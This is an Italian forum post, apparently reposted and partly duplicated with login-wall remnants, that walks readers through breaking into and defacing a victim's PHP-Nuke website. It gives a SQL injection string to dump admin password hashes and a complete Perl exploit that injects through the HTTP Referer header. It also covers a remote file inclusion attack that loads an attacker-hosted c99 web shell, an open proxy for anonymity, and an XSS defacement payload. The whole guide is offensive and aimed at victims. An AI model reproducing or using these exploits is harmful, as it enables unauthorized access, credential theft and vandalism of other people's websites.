Bene, Finalmente Dopo Tanto Tempo Di Ricerca Vi Posto Questa Guida..... Uno Dei Trucchi Che Si Usano Nei Retro Habbo :si: E Che Lo Sanno In Pochi.....
Iniziamo...
Materiale:
1 Sito Web della Vittima (esempio php-nuke)
2 Cercare Vulnerabilità del sito (php-nuke)
3 Trovare exploit per i bug del sito (php-nuke)
4 Usare un Proxy per essere anonimi
5 Avviare Exploit e avere accesso Root al sito
6 Fare il Deface ( "remote File Inclusion")
=========================================
Allora prima di tutto bisogna avere il sito web della vittima
per esempio:
Poi dobbiamo un pò perlustrare il sito vedere con che cosa è stato fatto... per poi trovare i Bug (vulnerabilità)
Per vedere il sito in che cosa è stato fatto (molte volte) basta semplicemente scorrere fino alla fine del sito
e vedrete una scritta "powered by ??"
se è in HTML c'è poco da fare
ma se è in php ci sono molte vulnerabilità da sfruttare!
Quindi facciamo caso che il sito della vittima è in php-nuke
(quindi in fondo al sito trovate "powered by phpnuke")
per trovare gli exploit basta andare su questo sito:
e scrivere "php-nuke"
poi premete cerca e vi troverete tutti gli exploit per phpnuke
Non sapete cosa sono gli exploit??
non c'è problema
ecco una definizione di exploit:
Un exploit è un termine usato in informatica per identificare un metodo che,
sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o al denial of service di un computer.
Ci sono diversi modi per classificare gli exploit. Il più comune è una classificazione a seconda del modo
in cui l'exploit contatta l'applicazione vulnerabile. Un exploit remoto è compiuto attraverso la rete
e sfrutta la vulnerabilità senza precedenti accessi al sistema.
Un exploit locale richiede un preventivo accesso al sistema
e solitamente fa aumentare i privilegi dell'utente oltre a quelli impostati dall'amministratore.
Gli exploit possono anche essere classificati a seconda del tipo di vulnerabilità
che sfruttano. Vedi buffer overflow, format string attacks, race condition, cross-site scripting,
e cross-site request forgery.
Lo scopo di molti exploit è quelli di prendere i privilegi di root su un sistema.
È comunque possibile usare exploit che dapprima acquisiscono
un accesso con i minimi privilegi e che poi li alzano fino ad arrivare a root.
Normalmente un exploit può sfruttare solo una specifica falla e quando è pubblicato
questa falla è riparata e l'exploit diventa obsoleto per le nuove versioni del programma.
Per questo motivo alcuni blackhat hackers non divulgano gli exploit trovati ma li tengono riservati per loro o per la loro community.
Questi exploit sono chiamati zero day exploit, e scoprire il loro contenuto è il più grande desiderio per gli attackers senza conoscenze,
altrimenti detti script kiddies.
Definizione presa da: Wikipedia "http://it.wikipedia.org/wiki/"
Prima di fare tutte queste cose bigogna essere proxati
per chi non sappia che cosa sono i proxy:
un proxy può garantire un maggiore livello di privacy
mascherando il vero indirizzo IP del client in modo
che il server non venga a conoscenza di chi ha effettuato la richiesta.
Definizione presa da: WikiPedia "http://it.wikipedia.org/wiki/Proxy"
=============================================
Mettere il proxy su "Mozilla FireFox"
Allora andate su questo sito:
poi prendete un proxy:
=========================
Proxy= 219.83.0.98
Porta= 3128
=========================
Adesso andate su "Strumenti"
poi su "Opzioni" e poi su
"Impostazione Connessioni"
dopo di ke mettete "Configurazione Manuale dei Proxy"
inserite il proxy e selezionate la casellina:
"Utilizzare lo stesso proxy per tutti i protocolli"
Poi premete OK
a questo punto siete proxati!!
Possiamo incominciare
===========================================
adesso vi spiego un Bug molto famoso del php-nuke
possiamo usare la famosa sql injection nel modulo di ricerca
quindi andiamo su Search e nella barra di scrittura mettiamo questa stringa:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
dopo averla messa mettete "Cerca"
e se il sito non è stato fixato
vi dovranno uscire tutte le password degli admin criptate in MD5
per decriptarle ecco l'exploit
e inserite la password decriptata in MD5
dopo qualke ora andate su:
Iniziamo...
Materiale:
1 Sito Web della Vittima (esempio php-nuke)
2 Cercare Vulnerabilità del sito (php-nuke)
3 Trovare exploit per i bug del sito (php-nuke)
4 Usare un Proxy per essere anonimi
5 Avviare Exploit e avere accesso Root al sito
6 Fare il Deface ( "remote File Inclusion")
=========================================
Allora prima di tutto bisogna avere il sito web della vittima
per esempio:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Poi dobbiamo un pò perlustrare il sito vedere con che cosa è stato fatto... per poi trovare i Bug (vulnerabilità)
Per vedere il sito in che cosa è stato fatto (molte volte) basta semplicemente scorrere fino alla fine del sito
e vedrete una scritta "powered by ??"
se è in HTML c'è poco da fare
ma se è in php ci sono molte vulnerabilità da sfruttare!
Quindi facciamo caso che il sito della vittima è in php-nuke
(quindi in fondo al sito trovate "powered by phpnuke")
per trovare gli exploit basta andare su questo sito:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e scrivere "php-nuke"
poi premete cerca e vi troverete tutti gli exploit per phpnuke
Non sapete cosa sono gli exploit??
non c'è problema
ecco una definizione di exploit:
Un exploit è un termine usato in informatica per identificare un metodo che,
sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o al denial of service di un computer.
Ci sono diversi modi per classificare gli exploit. Il più comune è una classificazione a seconda del modo
in cui l'exploit contatta l'applicazione vulnerabile. Un exploit remoto è compiuto attraverso la rete
e sfrutta la vulnerabilità senza precedenti accessi al sistema.
Un exploit locale richiede un preventivo accesso al sistema
e solitamente fa aumentare i privilegi dell'utente oltre a quelli impostati dall'amministratore.
Gli exploit possono anche essere classificati a seconda del tipo di vulnerabilità
che sfruttano. Vedi buffer overflow, format string attacks, race condition, cross-site scripting,
e cross-site request forgery.
Lo scopo di molti exploit è quelli di prendere i privilegi di root su un sistema.
È comunque possibile usare exploit che dapprima acquisiscono
un accesso con i minimi privilegi e che poi li alzano fino ad arrivare a root.
Normalmente un exploit può sfruttare solo una specifica falla e quando è pubblicato
questa falla è riparata e l'exploit diventa obsoleto per le nuove versioni del programma.
Per questo motivo alcuni blackhat hackers non divulgano gli exploit trovati ma li tengono riservati per loro o per la loro community.
Questi exploit sono chiamati zero day exploit, e scoprire il loro contenuto è il più grande desiderio per gli attackers senza conoscenze,
altrimenti detti script kiddies.
Definizione presa da: Wikipedia "http://it.wikipedia.org/wiki/"
Prima di fare tutte queste cose bigogna essere proxati
per chi non sappia che cosa sono i proxy:
un proxy può garantire un maggiore livello di privacy
mascherando il vero indirizzo IP del client in modo
che il server non venga a conoscenza di chi ha effettuato la richiesta.
Definizione presa da: WikiPedia "http://it.wikipedia.org/wiki/Proxy"
=============================================
Mettere il proxy su "Mozilla FireFox"
Allora andate su questo sito:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
poi prendete un proxy:
=========================
Proxy= 219.83.0.98
Porta= 3128
=========================
Adesso andate su "Strumenti"
poi su "Opzioni" e poi su
"Impostazione Connessioni"
dopo di ke mettete "Configurazione Manuale dei Proxy"
inserite il proxy e selezionate la casellina:
"Utilizzare lo stesso proxy per tutti i protocolli"
Poi premete OK
a questo punto siete proxati!!
Possiamo incominciare
===========================================
adesso vi spiego un Bug molto famoso del php-nuke
possiamo usare la famosa sql injection nel modulo di ricerca
quindi andiamo su Search e nella barra di scrittura mettiamo questa stringa:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
dopo averla messa mettete "Cerca"
e se il sito non è stato fixato
vi dovranno uscire tutte le password degli admin criptate in MD5
per decriptarle ecco l'exploit
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e inserite la password decriptata in MD5
dopo qualke ora andate su:
#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
banner()
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl \n"; print "\t[url]-vicitim webpage with index.php\n"; print "Example:\n"; print "\tperl exploit.pl http://phpnuke.org/index.php\n"; exit(0) }[/QUOTE] e inserite sempre la password criptata e walà uscirà la password DECRIPTATA Questo è uno dei tanti Bug del php-nuke dire che questo è il più famoso! Infatti se avete fatto la ricerca su milw0rm vi sarà uscito sicuramente anche questi exploit: # PHP-Nuke <= All version - Remote File Include Vulnerabilities [url]http://www.site.com/modules/Forums/admin/i...h=[evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
# milw0rm.com [2006-06-02]
allora con questi exploit potete uppare una backdoor per avere accesso a tutti i file del sito
esaminiamo l'exploit:
Perfavore, Entra oppure Registrati per vedere i Link![evil_scripts]
allora dove c'è "site.com" è ovvio deve esserci il sito della vittima poi
dove stà "evil_script"
dovete mettere il link della vostra shell uppa su un vostro dominio
allora se non avete la shell la potete scaricare da qui
(questa che state scaricando è la shell c99 che a mio parere è la migliore)
Perfavore, Entra oppure Registrati per vedere i Link!
dopo averla scaricata uppatela sul vostro sito
però con estensione in jpg o gif
per esempio così:
Perfavore, Entra oppure Registrati per vedere i Link!
dopo averla uppata infatti dove stà scritto
"evil_script" dovete mette il link della shell nel vostro sito!
quindi uscirà così:
Perfavore, Entra oppure Registrati per vedere i Link!
se il sito non è fixato cioè patchato potete visualizzare tutti i file e quindi anche vedere il file:
config.php
dove sono scritti l'user e la password
molto spesso però siete anche root
quindi potete anche modificare le pagine e qui viene
il deface
ecco una definizione di deface per chi non sappia cos'è:
Defacing (termine inglese che, come il suo sinonimo defacement, ha il significato letterale di "sfregiare, deturpare",
in italiano reso raramente con defacciare) nell'ambito della sicurezza informatica
ha il significato di cambiare illecitamente la home page di un sito web (la sua "faccia")
o modificarne, sostituendole, una o più pagine interne.
Tale pratica, condotta da parte di persone non autorizzate e all'insaputa
di chi gestisce il sito, è illegale in tutti i paesi del mondo.
Un sito che è stato oggetto di deface vede sostituita la propria pagina principale,
spesso insieme a tutte le pagine interne, con una schermata che
indica l'azione compiuta da uno o più cracker. Le motivazioni di tale atto vandalico
possono essere di vario tipo, dalla dimostrazione di abilità a ragioni ideologiche.
Le tecniche utilizzate per ottenere i permessi di accesso in scrittura al sito sfruttano
solitamente i bug presenti nel software di gestione del sito oppure nei sistemi operativi
sottostanti; più raro il caso di utilizzo di tecniche di ingegneria sociale.
Definizione presa da: Wikipedia "http://it.wikipedia.org/wiki/Defacing"
allora se avete letto il deface è sostituire la home del sito
quindi dobbiamo modificare la pagina "index.php"
infatti se scorrete tra i file del sito troverete sicuramente "index.php"
adesso premete sul pulsante affinco "modifica"
e adesso ci mettete quello che volete
ATTENZIONE:
LA HOME ORIGINALE Và LASCIATA!!
quindi basta che la home originale la rinominate
in "index_original.php"
e dopo potete modificare il file index.php come volete
"inserendo un'immagine o semplicemente una xss"
se volete che all'entrata ci sia una finestra che vi appare con scritto "Hacked By Hacker"
basta che scrivete:
<script>alert("Hacked by Hacker")</script>
e poi premete "Salva"
VI ricordo che dovete sempre essere PROXATI prima di fare queste cose!!
perchè anche se non fate danni è sempre ILLEGALE!!
Fonte: Narutoninja Forum
.....
Ultima modifica: